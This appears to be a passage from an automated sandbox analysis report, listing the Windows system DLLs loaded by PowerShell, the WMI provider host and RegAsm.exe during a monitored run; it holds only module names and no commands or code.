                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: comsvcs.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdataengine.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mscoree.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: apphelp.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: aclayers.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: version.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: vcruntime140_clr0400.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: uxtheme.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: windows.storage.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wldp.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: profapi.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptsp.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rsaenh.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptbase.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mswsock.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dnsapi.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: iphlpapi.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rasadhlp.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: fwpuclnt.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sspicli.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: amsi.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: userenv.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: avicap32.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msvfw32.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winmm.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winmm.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: windowscodecs.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
